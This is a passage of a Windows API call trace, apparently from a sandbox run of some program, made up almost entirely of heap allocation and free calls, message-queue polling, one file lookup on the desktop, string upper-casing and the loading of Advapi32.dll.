(HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0105.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0105.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0105.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0105.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0105.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0105.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0105.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0105.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0105.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0105.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0105.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0105.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0105.842] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/vY9PyxRY3.odp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 0x9a3b80 [0105.842] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.843] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0105.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0105.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0105.844] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.844] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0105.844] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.844] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0105.844] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.844] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.844] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0105.844] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0105.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.845] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0105.845] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.845] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0105.845] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.894] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.895] CharUpperBuffW (in: 